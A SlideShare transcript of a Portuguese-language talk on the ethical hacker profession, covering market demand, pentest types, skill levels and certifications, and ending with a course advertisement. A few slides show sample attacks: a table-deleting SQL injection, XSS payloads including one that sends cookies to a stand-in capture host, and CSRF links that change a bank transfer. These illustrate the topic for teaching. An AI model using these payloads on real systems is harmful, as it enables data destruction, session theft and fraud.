SlideShare a Scribd company logo
1 of 45
Download to read offline
A importância do profissional
Hacker Ético no mercado
Marcos Flávio Araújo Assunção
mflavio@defhack.com
Marcos Flávio Araújo Assunção
Formação:
Mestre em Sistemas de Informação pela Universidade Fumec
Especialista em Redes de Computadores pela ESAB
Especialista em Docência para o ensino profissional pelo Senac Minas
Graduado em Engenharia de Software pelo Centro Universitário UMA
Atuação:
Professor universitário no Centro Universitário UNA
Orientador de curso no Senac Minas
Consultor e palestrante em segurança de redes e ensino profissionalizante
Marcos Flávio Araújo Assunção
Certificações
CEH
CCNA
Cisco ITQ
Publicações:
Guia do Hacker Brasileiro
Desafio Linux Hacker
Segredos do Hacker Ético
(5 edições)
Honeypots e Honeynets
Wireless Hacking
Projetos:
Valhala Honeypot
Por que a área de IT
Security cresce tanto?
Principais problemas (Fonte: govtech.com)
Como o mercado vê o
Hacker ético
profissional?
Forbes – Hacker Ético é uma das
principais carreiras do futuro
Governo americano recruta hackers
globodigital
Cresce a busca pelo Hacker Ético
jornal-o-globo
MCT convida movimento Hacker
brasilgov
Precisa-se de Hackers experientes
estadominas-online
Quanto é o salário de
um Pentester (Ethical
Hacker) ?
Fonte: indeed.com
Pagamento médio CEH (Fonte: softwareadvice.com)
Linkedin: a fonte de oportunidades em Ethical Hacking
Freelancing em Ethical Hacking
O que faz um
profissional Hacker
Ético / Pentester ?
Penetration Test (Teste de Invasão)
 Consiste em utilizar
técnicas de Hackers em
testes de stress da
segurança de redes e
sistemas
 É a principal ferramenta
de um Hacker Ético
 CEH, LPT, Ethical Hacking
Foundation, OCSP, GWAPT,
GPEN, etc.
Padrões e entidades que exigem Penetration Tests
Teste de “stress” – Uma necessidade real
Teste de “stress” - Pressão
capacete
Teste de “stress” - Temperatura
flame-test-helmet
Fases de um PenTest
Tipos de Penetration Test
Black Box
White Box
Gray Box
Black Box
Teste realizado em um sistema remoto, sem
nenhum conhecimento do alvo. O invasor deve
partir da estaca zero, sem informações sobre
endereços IPs públicos, sistemas operacionais
utilizados, tipos de roteadores e firewalls, etc.
Esse teste visa demonstrar a visão de um
atacante de fora da intranet da empresa.
Gray Box
Teste realizado entre departamentos ou sub-redes de uma
intranet, com conhecimento parcial da estrutura. O objetivo
desse teste é demonstrar até que ponto um funcionário
consegue chegar caso ele decida tentar acessar um sistema
de outro departamento ao qual ele não tem acesso legítimo.
Nesse tipo de PenTest, temos conhecimento parcial da rede,
como a faixa de endereços IPs utilizada na sub-rede de
origem, o endereço IP do gateway e do servidor DNS, etc.
White Box
Teste realizado em uma intranet local, com total
conhecimento do alvo. Nesse teste, temos o conhecimento
total de como a rede opera, sabemos todos os dispositivos,
endereços e sistemas operacionais utilizados. A visão de um
teste White Box é a de um administrador de rede. Essa
metodologia de testagem é utilizada quando desejamos
conhecer até onde um administrador poderá ir caso deseje
acessar dados ou obter informações, tais como conversar de
MSN, senhas de usuários, e-mails alheios, etc.
Níveis de um Pentester / Ethical Hacker
Nível 1 – Júnior – Tool based Penetration Tester:
Esse profissional é aquele que somente conhece as ferramentas básicas para
o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas.
Muitas vezes aprenderam as técnicas em treinamentos específicos.
Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e
GWapt
Nível 2 – Pleno – Coding based Penetration Tester:
Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para
a realização dos penetration tests, mas ainda está limitado ao teste de
vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções
existentes, como criar novos módulos para o Metasploit. Necessita de
conhecimentos pelo menos em algoritmos e linguagens básicas de programação.
Temos nesse nível o OSCP.
Nível 3 – Sênior – Vulnerability Researcher:
Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento
mais avançado preferem debugar o funcionamento de softwares e protocolos
em busca de falhas do tipo 0-day, e muitos são contratados por empresas com
essa finalidade. Ainda não existe uma certificação de peso neste nível.
Certificações de
Ethical Hacking
EXIN Ethical Hacking Foundation
EC-COUNCIL Certified Ethical Hacker (CEH)
EC-COUNCIL ECSA Pentest
ECCOUNCIL Licensed Penetration Tester
GIAC - GPEN
GIAC GWAPT
Offensive Security Certified Professional
Exemplos de
vulnerabilidades
testadas
Falhas de softwares
 Buffer Overflows
(Stack e Heap)
 Strings de format
vulneráveis
 Memory corruption
 Injection (SQL,
XPATH, CMD, XSS,
CSRF)
 Permissões incorretas
SQL Injection
GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users
WHERE 1=‘1 HTTP/1.1
SELECT *
FROM users
WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’
Cross Site Scripting <XSS>
 <script> alert(‘Oi’!) </script>
 <script>
location.href=“http://www.site.com/captura.cfm?c=“
+ document.cookie</script>
 <a href=“javas&#99;ript&#35;[código]>
 <div style=“behaviour: url([código]);”>
 <body onload=“[código]”>
 <img src=“javascript:[código]”>
Cross Site Request Forgery (CSRF)
 Exemplo: Maria está logada no site do banco e a URL da transação é:
http://banco.com/transf?conta=MARIA&quantia=100
Um ataque pode criar um link que altera o valor da transação:
<a href=http://banco.com/transf?conta=MARIA$quantia=100000>
Ou uma imagem “falsa”:
<img src=http://banco.com/transf?conta=MARIA$quantia=100000>
Quero atuar na área.
Como começar?
Treinamento em Fundamentos de Ethical Hacking
• 21 horas de vídeos
• 175 aulas
• Acesso ilimitado e eterno
• Certificado internacional
• Conteúdo aborda a maioria
das certificações de PenTest
• 50% de desconto: pague apenas 100
reais pelo curso.
Acesse para aproveitar a promoção:
www.marcosflavio.com.br
Dúvidas?
A importância do profissional
Hacker Ético no mercado
Marcos Flávio Araújo Assunção
mflavio@defhack.com

More Related Content

What's hot

Conscientização sobre a Segurança da Informação
Conscientização sobre a Segurança da InformaçãoConscientização sobre a Segurança da Informação
Conscientização sobre a Segurança da InformaçãoJean Israel B. Feijó
 
Segurança Cibernética
Segurança CibernéticaSegurança Cibernética
Segurança CibernéticaBruno Miranda
 
As 5 forças de porter
As 5 forças de porterAs 5 forças de porter
As 5 forças de porterBelle Maluf
 
Gestão Da Informação
Gestão Da InformaçãoGestão Da Informação
Gestão Da InformaçãoFelipe Goulart
 
Segurança da Informação - Ataques de Rede
Segurança da Informação - Ataques de RedeSegurança da Informação - Ataques de Rede
Segurança da Informação - Ataques de RedeNatanael Simões
 
Sosyal Mühendislik
Sosyal MühendislikSosyal Mühendislik
Sosyal MühendislikSelman
 
Seguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - NovoSeguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - NovoLuiz Arthur
 
Aula 3 Sistemas de Informação - Tipos de SI
Aula 3 Sistemas de Informação - Tipos de SIAula 3 Sistemas de Informação - Tipos de SI
Aula 3 Sistemas de Informação - Tipos de SIDaniel Brandão
 
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAAULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAMaraLuizaGonalvesFre
 
Segurança da informação
Segurança da informaçãoSegurança da informação
Segurança da informaçãoSamantha Nunes
 
Treinamento Sonicwall
Treinamento SonicwallTreinamento Sonicwall
Treinamento SonicwallLeo Costa
 
A inteligência da Organização Policial
A inteligência da Organização PolicialA inteligência da Organização Policial
A inteligência da Organização PolicialCelso Ferro
 
Simulado EXIM ISO27002
Simulado EXIM ISO27002Simulado EXIM ISO27002
Simulado EXIM ISO27002luanrjesus
 
Ameacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdfAmeacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdfEdkallenn Lima
 
Técnicas de Invasão - INFOESTE 2015
Técnicas de Invasão - INFOESTE 2015Técnicas de Invasão - INFOESTE 2015
Técnicas de Invasão - INFOESTE 2015C H
 
A importância da Segurança da Informação e os impactos da LGPD
A importância da Segurança da Informação e os impactos da LGPDA importância da Segurança da Informação e os impactos da LGPD
A importância da Segurança da Informação e os impactos da LGPDEliézer Zarpelão
 
Cloud Computing - Computação em Nuvem
Cloud Computing - Computação em NuvemCloud Computing - Computação em Nuvem
Cloud Computing - Computação em NuvemCompanyWeb
 

What's hot (20)

Conscientização sobre a Segurança da Informação
Conscientização sobre a Segurança da InformaçãoConscientização sobre a Segurança da Informação
Conscientização sobre a Segurança da Informação
 
Segurança Cibernética
Segurança CibernéticaSegurança Cibernética
Segurança Cibernética
 
As 5 forças de porter
As 5 forças de porterAs 5 forças de porter
As 5 forças de porter
 
Gestão Da Informação
Gestão Da InformaçãoGestão Da Informação
Gestão Da Informação
 
Segurança da Informação - Ataques de Rede
Segurança da Informação - Ataques de RedeSegurança da Informação - Ataques de Rede
Segurança da Informação - Ataques de Rede
 
Sosyal Mühendislik
Sosyal MühendislikSosyal Mühendislik
Sosyal Mühendislik
 
Seguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - NovoSeguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - Novo
 
Aula 3 Sistemas de Informação - Tipos de SI
Aula 3 Sistemas de Informação - Tipos de SIAula 3 Sistemas de Informação - Tipos de SI
Aula 3 Sistemas de Informação - Tipos de SI
 
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAAULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
 
Boas Práticas em Segurança da Informação
Boas Práticas em Segurança da InformaçãoBoas Práticas em Segurança da Informação
Boas Práticas em Segurança da Informação
 
Segurança da informação
Segurança da informaçãoSegurança da informação
Segurança da informação
 
O inimigo interno - Information security
O inimigo interno - Information securityO inimigo interno - Information security
O inimigo interno - Information security
 
Treinamento Sonicwall
Treinamento SonicwallTreinamento Sonicwall
Treinamento Sonicwall
 
A inteligência da Organização Policial
A inteligência da Organização PolicialA inteligência da Organização Policial
A inteligência da Organização Policial
 
Simulado EXIM ISO27002
Simulado EXIM ISO27002Simulado EXIM ISO27002
Simulado EXIM ISO27002
 
Ameacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdfAmeacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdf
 
Técnicas de Invasão - INFOESTE 2015
Técnicas de Invasão - INFOESTE 2015Técnicas de Invasão - INFOESTE 2015
Técnicas de Invasão - INFOESTE 2015
 
A importância da Segurança da Informação e os impactos da LGPD
A importância da Segurança da Informação e os impactos da LGPDA importância da Segurança da Informação e os impactos da LGPD
A importância da Segurança da Informação e os impactos da LGPD
 
LGPD e Segurança da Informação
LGPD e Segurança da InformaçãoLGPD e Segurança da Informação
LGPD e Segurança da Informação
 
Cloud Computing - Computação em Nuvem
Cloud Computing - Computação em NuvemCloud Computing - Computação em Nuvem
Cloud Computing - Computação em Nuvem
 

Viewers also liked

The Most Likeable Senior Executives Online
The Most Likeable Senior Executives OnlineThe Most Likeable Senior Executives Online
The Most Likeable Senior Executives OnlineLikeable Media
 
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...switchingonthefuture
 
Why Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from ParentsWhy Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from ParentsStittsvilleCentral.ca
 
Rompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiereRompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiereNinja Academy
 
Teori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasarTeori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasarFarrel Pedroza
 
ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6창훈 정
 
Transparencies ch07-pp274-283
Transparencies ch07-pp274-283Transparencies ch07-pp274-283
Transparencies ch07-pp274-283lschmidt1170
 
Comparative and superlative
Comparative and superlativeComparative and superlative
Comparative and superlativeVanessa Jensen
 
7th math c2 -l15
7th math c2 -l157th math c2 -l15
7th math c2 -l15jdurst65
 
Prepaid Vs Post-paid Energy
Prepaid Vs Post-paid EnergyPrepaid Vs Post-paid Energy
Prepaid Vs Post-paid Energyphil_Brook
 
Climatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in SyriaClimatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in SyriaICARDA
 
Organizing with online elections
Organizing with online electionsOrganizing with online elections
Organizing with online electionsAshley Knuckles
 
痛風者救星
痛風者救星痛風者救星
痛風者救星lys167
 
1 luce è libertà
1 luce è libertà1 luce è libertà
1 luce è libertàmariadelia1
 
FameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & MarketplaceFameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & MarketplaceMichael Herlache
 

Viewers also liked (20)

MARZO 18 AL 23 DE 2013
MARZO 18 AL 23 DE 2013MARZO 18 AL 23 DE 2013
MARZO 18 AL 23 DE 2013
 
The Most Likeable Senior Executives Online
The Most Likeable Senior Executives OnlineThe Most Likeable Senior Executives Online
The Most Likeable Senior Executives Online
 
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
 
Why Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from ParentsWhy Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from Parents
 
Rompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiereRompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiere
 
Teori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasarTeori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasar
 
Vayu, the Ayurvedic neurology.
Vayu, the Ayurvedic neurology.Vayu, the Ayurvedic neurology.
Vayu, the Ayurvedic neurology.
 
ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6
 
Transparencies ch07-pp274-283
Transparencies ch07-pp274-283Transparencies ch07-pp274-283
Transparencies ch07-pp274-283
 
Comparative and superlative
Comparative and superlativeComparative and superlative
Comparative and superlative
 
vivek
vivekvivek
vivek
 
7th math c2 -l15
7th math c2 -l157th math c2 -l15
7th math c2 -l15
 
Prepaid Vs Post-paid Energy
Prepaid Vs Post-paid EnergyPrepaid Vs Post-paid Energy
Prepaid Vs Post-paid Energy
 
Climatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in SyriaClimatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in Syria
 
Catholic doctor
Catholic doctorCatholic doctor
Catholic doctor
 
Organizing with online elections
Organizing with online electionsOrganizing with online elections
Organizing with online elections
 
痛風者救星
痛風者救星痛風者救星
痛風者救星
 
1 luce è libertà
1 luce è libertà1 luce è libertà
1 luce è libertà
 
FameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & MarketplaceFameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & Marketplace
 
100%
100%100%
100%
 

Similar to Importância do Hacker Ético

Ethical Hacker - Segurança da Informação
Ethical Hacker - Segurança da InformaçãoEthical Hacker - Segurança da Informação
Ethical Hacker - Segurança da InformaçãoGionni Lúcio
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesAlisson Fuckner
 
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
 [GUTS-RS] - Testes de Segurança: O que preciso saber para planejar [GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejarGUTS-RS
 
Desenvolvimento de exploits
Desenvolvimento de exploitsDesenvolvimento de exploits
Desenvolvimento de exploitsNaraBarros10
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Roberto Soares
 
Semana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdfSemana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdffabio154906
 
Analise de Vulnerabilidade
Analise de VulnerabilidadeAnalise de Vulnerabilidade
Analise de VulnerabilidadeCassio Ramos
 
Slides ataques e vulnerabilidades
Slides   ataques e vulnerabilidadesSlides   ataques e vulnerabilidades
Slides ataques e vulnerabilidadescheeshirecat
 
Como começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day FatecComo começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day FatecJoas Antonio dos Santos
 
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasP3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasPotiLivre Sobrenome
 
Unidade 1.1 Introdução ao Software
Unidade 1.1 Introdução ao SoftwareUnidade 1.1 Introdução ao Software
Unidade 1.1 Introdução ao SoftwareJuan Carlos Lamarão
 

Similar to Importância do Hacker Ético (20)

Ethical Hacker - Segurança da Informação
Ethical Hacker - Segurança da InformaçãoEthical Hacker - Segurança da Informação
Ethical Hacker - Segurança da Informação
 
Ethical Hacking - Campus Party Brasília 2017
Ethical Hacking - Campus Party Brasília 2017Ethical Hacking - Campus Party Brasília 2017
Ethical Hacking - Campus Party Brasília 2017
 
Introdução de teste de segurança app web
Introdução de teste de segurança app webIntrodução de teste de segurança app web
Introdução de teste de segurança app web
 
Aula de seguranca (1)
Aula de seguranca (1)Aula de seguranca (1)
Aula de seguranca (1)
 
Hacker Ético
Hacker ÉticoHacker Ético
Hacker Ético
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
 
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
 [GUTS-RS] - Testes de Segurança: O que preciso saber para planejar [GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
 
Desenvolvimento de exploits
Desenvolvimento de exploitsDesenvolvimento de exploits
Desenvolvimento de exploits
 
Java security
Java securityJava security
Java security
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"
 
Semana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdfSemana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdf
 
Analise de Vulnerabilidade
Analise de VulnerabilidadeAnalise de Vulnerabilidade
Analise de Vulnerabilidade
 
Slides ataques e vulnerabilidades
Slides   ataques e vulnerabilidadesSlides   ataques e vulnerabilidades
Slides ataques e vulnerabilidades
 
Artigo cientifico
Artigo cientifico Artigo cientifico
Artigo cientifico
 
PenTest com Kali linux - VI Engitec
PenTest com Kali linux - VI EngitecPenTest com Kali linux - VI Engitec
PenTest com Kali linux - VI Engitec
 
Como começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day FatecComo começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day Fatec
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasP3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
 
Unidade 1.1 Introdução ao Software
Unidade 1.1 Introdução ao SoftwareUnidade 1.1 Introdução ao Software
Unidade 1.1 Introdução ao Software
 

Importância do Hacker Ético

  • 1. A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com
  • 2. Marcos Flávio Araújo Assunção Formação: Mestre em Sistemas de Informação pela Universidade Fumec Especialista em Redes de Computadores pela ESAB Especialista em Docência para o ensino profissional pelo Senac Minas Graduado em Engenharia de Software pelo Centro Universitário UMA Atuação: Professor universitário no Centro Universitário UNA Orientador de curso no Senac Minas Consultor e palestrante em segurança de redes e ensino profissionalizante
  • 3. Marcos Flávio Araújo Assunção Certificações CEH CCNA Cisco ITQ Publicações: Guia do Hacker Brasileiro Desafio Linux Hacker Segredos do Hacker Ético (5 edições) Honeypots e Honeynets Wireless Hacking Projetos: Valhala Honeypot
  • 4. Por que a área de IT Security cresce tanto?
  • 6. Como o mercado vê o Hacker ético profissional?
  • 7. Forbes – Hacker Ético é uma das principais carreiras do futuro
  • 8. Governo americano recruta hackers globodigital
  • 9. Cresce a busca pelo Hacker Ético jornal-o-globo
  • 10. MCT convida movimento Hacker brasilgov
  • 11. Precisa-se de Hackers experientes estadominas-online
  • 12. Quanto é o salário de um Pentester (Ethical Hacker) ?
  • 14. Pagamento médio CEH (Fonte: softwareadvice.com)
  • 15. Linkedin: a fonte de oportunidades em Ethical Hacking
  • 17. O que faz um profissional Hacker Ético / Pentester ?
  • 18. Penetration Test (Teste de Invasão)  Consiste em utilizar técnicas de Hackers em testes de stress da segurança de redes e sistemas  É a principal ferramenta de um Hacker Ético  CEH, LPT, Ethical Hacking Foundation, OCSP, GWAPT, GPEN, etc.
  • 19. Padrões e entidades que exigem Penetration Tests
  • 20. Teste de “stress” – Uma necessidade real
  • 21. Teste de “stress” - Pressão capacete
  • 22. Teste de “stress” - Temperatura flame-test-helmet
  • 23. Fases de um PenTest
  • 24. Tipos de Penetration Test Black Box White Box Gray Box
  • 25. Black Box Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa.
  • 26. Gray Box Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc.
  • 27. White Box Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc.
  • 28. Níveis de um Pentester / Ethical Hacker Nível 1 – Júnior – Tool based Penetration Tester: Esse profissional é aquele que somente conhece as ferramentas básicas para o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas. Muitas vezes aprenderam as técnicas em treinamentos específicos. Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e GWapt Nível 2 – Pleno – Coding based Penetration Tester: Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda está limitado ao teste de vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções existentes, como criar novos módulos para o Metasploit. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação. Temos nesse nível o OSCP. Nível 3 – Sênior – Vulnerability Researcher: Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. Ainda não existe uma certificação de peso neste nível.
  • 30. EXIN Ethical Hacking Foundation
  • 38. Falhas de softwares  Buffer Overflows (Stack e Heap)  Strings de format vulneráveis  Memory corruption  Injection (SQL, XPATH, CMD, XSS, CSRF)  Permissões incorretas
  • 39. SQL Injection GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users WHERE 1=‘1 HTTP/1.1 SELECT * FROM users WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’
  • 40. Cross Site Scripting <XSS>  <script> alert(‘Oi’!) </script>  <script> location.href=“http://www.site.com/captura.cfm?c=“ + document.cookie</script>  <a href=“javas&#99;ript&#35;[código]>  <div style=“behaviour: url([código]);”>  <body onload=“[código]”>  <img src=“javascript:[código]”>
  • 41. Cross Site Request Forgery (CSRF)  Exemplo: Maria está logada no site do banco e a URL da transação é: http://banco.com/transf?conta=MARIA&quantia=100 Um ataque pode criar um link que altera o valor da transação: <a href=http://banco.com/transf?conta=MARIA$quantia=100000> Ou uma imagem “falsa”: <img src=http://banco.com/transf?conta=MARIA$quantia=100000>
  • 42. Quero atuar na área. Como começar?
  • 43. Treinamento em Fundamentos de Ethical Hacking • 21 horas de vídeos • 175 aulas • Acesso ilimitado e eterno • Certificado internacional • Conteúdo aborda a maioria das certificações de PenTest • 50% de desconto: pague apenas 100 reais pelo curso. Acesse para aproveitar a promoção: www.marcosflavio.com.br
  • 45. A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com